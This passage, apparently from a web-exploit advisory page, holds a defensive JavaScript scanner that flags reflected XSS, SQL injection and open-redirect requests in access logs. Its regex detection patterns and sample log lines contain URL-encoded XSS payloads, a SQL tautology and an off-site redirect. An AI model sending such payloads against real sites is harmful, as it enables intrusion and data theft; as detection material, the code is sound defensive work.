Zigoo.eg |<br /> |<br />=======================================================================================================================================<br /></code></pre>
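As an added defender-side example serving all of the web application advisories above (CraCkEr's reflected XSS and SQL injection reports, nu11secur1ty's SLIMS and zstore XSS reports, and indoushka's WPtouch open redirect), the following scanner, which is not part of any advisory, URL-decodes the query string of web-server access-log lines and flags the three request shapes those advisories report: reflected XSS markup or a JavaScript break-out in parameters such as `page`, `keyword` and `id`, SQL injection syntax in parameters such as `keyword`, and an off-site `redirect` target as in the `wptouch_switch` request. The log lines and the `HOST_ALLOWLIST` are constructed, modelled on the advisory URLs; the SQL injection sample uses a generic tautology because the advisories only give an `[INJECT-HERE]` placeholder.

```javascript
// Added detection example (not from any advisory on this page): scan access
// log lines for the request shapes the advisories describe. SAMPLE_LOG and
// HOST_ALLOWLIST are constructed for this illustration.

const XSS_MARKUP = /<\s*(script|img|svg|iframe|a)\b|on(error|load|click|mouseover)\s*=|javascript:/i;
const XSS_JS_BREAKOUT = /["'][\s;]*(alert|prompt|confirm)\s*\(/i; // keyword=tv24708";alert(1)// style
const SQLI = /(['"]\s*(or|and)\s+['"\d])|(\bunion\b[\s\S]*\bselect\b)|(\bsleep\s*\()|(--\s*$)|(\bbenchmark\s*\()/i;
// Hosts a redirect is allowed to point at (the advisories' placeholder hosts).
const HOST_ALLOWLIST = new Set(['www.website.com', 'example', '127.0.0.1']);

function safeDecode(s) {
  try { return decodeURIComponent(s.replace(/\+/g, ' ')); } catch { return s; }
}

// Parse a common/combined-format line far enough to get method, path and
// decoded query parameters. Returns null for lines with no request token.
function parseAccessLogLine(line) {
  const m = line.match(/"([A-Z]+) (\S+) HTTP\/[\d.]+"/);
  if (!m) return null;
  const [, method, target] = m;
  const q = target.indexOf('?');
  const path = q < 0 ? target : target.slice(0, q);
  const params = {};
  if (q >= 0) {
    for (const part of target.slice(q + 1).split('&')) {
      const eq = part.indexOf('=');
      const k = safeDecode(eq < 0 ? part : part.slice(0, eq));
      params[k] = eq < 0 ? '' : safeDecode(part.slice(eq + 1));
    }
  }
  return { method, path, params };
}

// A redirect target is off-site if it is absolute and its host is not ours.
function isOffsiteRedirect(value, ownHosts) {
  let u;
  try { u = new URL(value, 'https://placeholder.invalid/'); } catch { return false; }
  if (u.host === 'placeholder.invalid') return false; // relative target stays on site
  return !ownHosts.has(u.hostname);
}

function classifyRequest(req, ownHosts = HOST_ALLOWLIST) {
  const findings = [];
  for (const [name, value] of Object.entries(req.params)) {
    if (XSS_MARKUP.test(value) || XSS_JS_BREAKOUT.test(value)) findings.push({ param: name, type: 'reflected-xss' });
    if (SQLI.test(value)) findings.push({ param: name, type: 'sqli' });
    if (name === 'redirect' && isOffsiteRedirect(value, ownHosts)) findings.push({ param: name, type: 'open-redirect' });
  }
  return findings;
}

function scanLog(lines) {
  const out = [];
  for (const line of lines) {
    const req = parseAccessLogLine(line);
    if (!req) continue;
    const findings = classifyRequest(req);
    if (findings.length) out.push({ path: req.path, findings });
  }
  return out;
}

// Constructed log lines modelled on the advisory URLs; the last one is benign.
const SAMPLE_LOG = [
  '203.0.113.5 - - [18/Jan/2023:10:00:01 +0000] "GET /index.php?page=product%2fcouponsh446k%3cimg%20src%3da%20onerror%3dalert(1)%3eciqs8 HTTP/1.1" 200 5120',
  '203.0.113.5 - - [18/Jan/2023:10:00:02 +0000] "GET /index.php?page=product/productviews&keyword=tv24708%22%3balert(1)%2f%2f279 HTTP/1.1" 200 4870',
  '203.0.113.6 - - [18/Jan/2023:10:00:03 +0000] "GET /rezervasyon.php?id=3mteyx%22%3e%3cscript%3ealert(1)%3c%2fscript%3esih3w HTTP/1.1" 200 3301',
  '203.0.113.7 - - [18/Jan/2023:10:00:04 +0000] "GET /ecommerce/search?color=%23CD5C5C&keyword=G502%27%20OR%20%271%27%3D%271 HTTP/1.1" 500 0',
  '203.0.113.8 - - [18/Jan/2023:10:00:05 +0000] "GET /incelhr/?wptouch_switch=desktop&redirect=https://packetstormsecurity.com/&nonce=9d69c21a5a HTTP/1.1" 302 0',
  '203.0.113.9 - - [18/Jan/2023:10:00:06 +0000] "GET /index.php?page=product/productviews&keyword=tv HTTP/1.1" 200 4870',
];
```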